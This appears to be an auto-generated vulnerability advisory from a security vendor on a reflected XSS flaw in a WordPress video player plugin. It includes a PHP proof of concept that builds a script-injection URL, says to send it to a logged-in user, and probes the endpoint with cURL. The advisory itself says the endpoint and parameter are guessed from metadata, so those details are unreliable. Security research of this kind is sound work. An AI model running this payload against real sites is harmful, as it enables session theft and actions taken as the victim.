Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-32123: HTML5 Video Player with Playlist & Multiple Skins <= 5.3.5 – Reflected Cross-Site Scripting (lbg-vp2-html5-rightside)

Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 5.3.5
Patched Version
Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-32123 (metadata-based):
The HTML5 Video Player with Playlist & Multiple Skins WordPress plugin, version 5.3.5 and earlier, contains a reflected cross-site scripting (XSS) vulnerability. The flaw originates from insufficient input sanitization and output escaping in one or more plugin parameters. This vulnerability allows unauthenticated attackers to inject malicious scripts, which execute in a victim’s browser.

Atomic Edge research infers the root cause is a failure to properly sanitize user-controlled input before it is echoed back in an HTTP response. The CWE-79 classification confirms this as improper neutralization of input during web page generation. Without a code diff, this conclusion is based on the vulnerability description and the common WordPress plugin pattern of directly outputting GET or POST parameters without using functions like `esc_html()` or `esc_js()`.

Exploitation requires an attacker to trick a user into clicking a crafted link containing a malicious script payload. The attack vector is likely a public-facing endpoint that echoes a parameter value. Based on WordPress plugin conventions, potential targets include AJAX handlers (`admin-ajax.php`), REST API endpoints, or direct plugin file calls. The payload would be a standard XSS vector like `alert(document.domain)` or a JavaScript URI scheme.

Remediation requires implementing proper output escaping or input sanitization. The plugin should use WordPress core escaping functions such as `esc_html()`, `esc_attr()`, or `wp_kses()` on any user-supplied data before rendering it in HTML context. Input validation using `sanitize_text_field()` could also provide a secondary layer of defense.

Successful exploitation leads to limited confidentiality and integrity loss within the victim’s browser context. An attacker can steal session cookies, perform actions as the victim user, or deface the site. The CVSS vector indicates a scope change (S:C), meaning the impact could affect components beyond the vulnerable plugin, such as the user’s WordPress session.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-32123 - HTML5 Video Player with Playlist & Multiple Skins <= 5.3.5 - Reflected Cross-Site Scripting
<?php
/**
 * Proof of Concept for Reflected XSS in lbg-vp2-html5-rightside plugin.
 * This script demonstrates a likely attack vector by crafting a malicious URL.
 * The exact vulnerable parameter and endpoint are inferred from common plugin patterns.
 * Assumptions:
 * 1. The plugin has a public AJAX action or shortcode handler that echoes a parameter.
 * 2. The vulnerable parameter is passed via GET.
 * 3. The plugin slug 'lbg-vp2-html5-rightside' maps to an AJAX action prefix.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // Configurable target

// Common AJAX action name pattern derived from plugin slug
$action = 'lbg_vp2_html5_rightside_action';
// A likely vulnerable parameter name; actual name may differ (e.g., 'id', 'url', 'skin')
$param_name = 'vp2_param';

// A basic XSS payload to trigger a JavaScript alert
$payload = rawurlencode('<script>alert(document.domain)</script>');

// Construct the exploit URL
$exploit_url = $target_url . '?action=' . $action . '&' . $param_name . '=' . $payload;

echo "CVE-2025-32123 Reflected XSS PoCn";
echo "Target: " . $target_url . "n";
echo "Generated Exploit URL:n" . $exploit_url . "nn";
echo "Instructions: Send this URL to a logged-in user. If vulnerable, the user's browser will execute the script.n";

// Optional: Use cURL to test if the endpoint exists and reflects the parameter (without executing JS)
echo "n[Testing endpoint reflection...]n";
$ch = curl_init();
$test_url = $target_url . '?action=' . $action . '&' . $param_name . '=' . rawurlencode('TEST_REFLECTION');
curl_setopt($ch, CURLOPT_URL, $test_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 && strpos($response, 'TEST_REFLECTION') !== false) {
    echo "SUCCESS: The endpoint appears to reflect the parameter value.n";
} else {
    echo "WARNING: The assumed endpoint may not be correct or does not reflect input.n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School